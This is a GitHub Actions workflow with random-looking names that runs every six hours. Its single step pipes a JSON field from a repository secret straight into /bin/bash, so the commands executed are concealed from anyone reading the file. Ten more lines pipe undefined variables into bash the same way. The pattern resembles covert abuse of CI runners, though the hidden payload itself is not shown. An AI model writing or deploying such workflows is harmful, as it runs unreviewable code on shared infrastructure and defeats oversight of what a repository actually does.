name: wuhaoning3214

on:
  workflow_dispatch:
  schedule:
    - cron: '26 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          ag9: ${{ secrets.ag9 }}
        run: |
          echo $ag9 | jq -r .jdwh13 | /bin/bash
          echo $hm92341 | jq -r .o243 | /bin/bash
          echo $qhie2 | jq -r .ayjx756 | /bin/bash
          echo $zxmnt7536 | jq -r .vcjny19677 | /bin/bash
          echo $yvm0 | jq -r .ekfr8683 | /bin/bash
          echo $x54058 | jq -r .u74152 | /bin/bash
          echo $ri31403 | jq -r .e830 | /bin/bash
          echo $uca68023 | jq -r .aycxe38525 | /bin/bash
          echo $wzl77 | jq -r .k8944 | /bin/bash
          echo $spo1075 | jq -r .gulz2 | /bin/bash
          echo $xkq86130 | jq -r .hdc1 | /bin/bash

